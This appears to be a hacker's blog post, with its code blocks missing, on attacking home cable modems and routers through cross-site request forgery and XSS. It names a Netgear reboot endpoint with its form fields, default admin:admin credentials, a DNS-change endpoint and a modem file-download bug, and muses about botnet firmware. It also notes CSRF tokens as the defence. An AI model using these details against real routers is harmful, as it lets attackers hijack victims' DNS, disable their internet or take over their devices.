The Surfboard cable modem offers little in functionality besides rebooting unless of course I wanted to be malicious and remove all settings on the cable modem and essentially turn it into a door stop until the thing can be activated again by the ISP.
But that would be a real dick move.
Why does this attack work? First off, its unauthenticated so anyone can do this provided they’re on the local network. XSS comes in handy for when you want the victim to do something / visit somewhere. Since the victim is the one doing the running the script and not me, they’re already on the local network.
What about CenturyLink? I got your back here for their modern actiontek’s.
Am I done with modems? NO! There’s 1 more gem to go over!
I was rummaging through my old stuff and found an old DSL modem. Yet another actiontek from Qwest internet (now known as CentruryLink).
Just booting the thing up and browsing to the setup page I found this:
File download vulnerability. I used it to read the ELF bin inside.
Using the strings I was able to google a little more info on the thing. I came across
Just insert the code into an iframe or web page and wait.
What if I wanted to attack people’s routers instead of the modem? Most consumer routers are at the very least password protected, but for the most part, they use the out of the box defaults. Because who sets the password these days right? Not my dad!
So how would you attack them? My netgear modem for example uses HTTP Basic auth and out of the box, the default username / password combo is admin:admin.
So 2 values need to be posted to the URI /apply.cgi?/reboot_waiting.htm.
name=”yes” value=”Yes” and name=”submit_flag” value=”reboot”
So we do something like so:
This should reboot a netgear router assuming they didn’t change their password defaults.
Rebooting the router is only the tip of the iceberg. What if I coded this to change the user’s DNS servers to my own? Or better yet, enabled remote management? The real fun comes to mind however when we consider the possibility of passing a custom firmware image, like a hacked OpenWRT OS that calls home to daddy and allows for a botnet. All from visiting a compromised site, or better yet, some sort of reflective XSS somewhere. Why attempt to install malware on the victim’s PC when I can own everyone using the router instead?
Code time! Let’s dive right in.
Disable the net? Sure.
Enable remote administration? Why not.
When you first attempt to visit the admin page, there is no HTTP auth. No, its instead a form based authorization. This is because the router’s web server stores the session and doesn’t rely on things like cookies or basic auth for verification.
So how do we go about having some fun? In this example, we’ll modify DNS settings. Because if you control your victim’s DNS, you control your victim. First off we’ll need to authenticate:
Then we submit to ‘h_wan_fix.cgi’ our settings after we’ve logged in:
In keeping with the other content, we can’t leave out the reboot code can we?
Now we adapt to our needs:
What about other routers and modems? Where does one go to get info on this? I found SetupRouter.com to be extremely helpful for finding manuals, default passes, and settings.
How could routers & modems defend against such an attack? CSRF tokens. In fact, I was trying this against a friend’s newer netgear and it had this protection enabled in the form of a “timestamp” variable included after each post request. Clever. What this means is my attack will only silently own older netgears 🙁
This post could go on and on, but I don’t have the funds to buy every router / modem out there and test. Part of the reason why I stuck to Cox / Qwest – they’re local to Phoenix. No FIOS here unfortunately.